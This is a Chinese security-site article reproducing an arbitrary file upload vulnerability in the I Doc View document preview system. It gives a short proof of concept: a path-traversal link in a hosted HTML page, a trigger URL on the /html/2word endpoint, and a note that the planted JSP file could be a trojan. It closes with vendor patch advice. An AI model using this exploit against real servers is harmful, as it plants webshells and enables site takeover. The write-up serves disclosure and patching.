I Doc View任意文件上传漏洞复现
2024-2-22 10:11:49 Author: www.freebuf.com(查看原文) 阅读量:24 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

I Doc View在线文档预览系统

受影响版本

I Doc View < 13.10.1_20231115

1.本地服务器上新建一个html文件,文件内容如下:

<!DOCTYPE html>
<html lang="en">
<head>
    <title>test</title>  
</head>
<body>
  <link href="/..\..\..\docview\testpoc.jsp">
</body>
</html>

2.本地服务器上新建一个..\..\..\docview\testpoc.jsp(可以换成木马什么的),内容如下:

test

3.上面这个文件可以这么来创建

4.创建好的文件如下:

5.之后可以在上面目录下用python启动一个http服务,接着直接访问漏洞地址http://目标地址/html/2word?url=http://本地服务器地址/tt.html触发该漏洞。

6.漏洞触发后,会在网站根目录下创建恶意jsp文件,如下图:

目前I Doc View官方已发布新版本修复该漏洞,建议受影响的用户尽快至官网下载更新或联系技术支持获取安全补丁修复漏洞。

官方链接:https://www.idocv.com/about.html


文章来源: https://www.freebuf.com/vuls/392266.html
如有侵权请联系:admin#unsafe.sh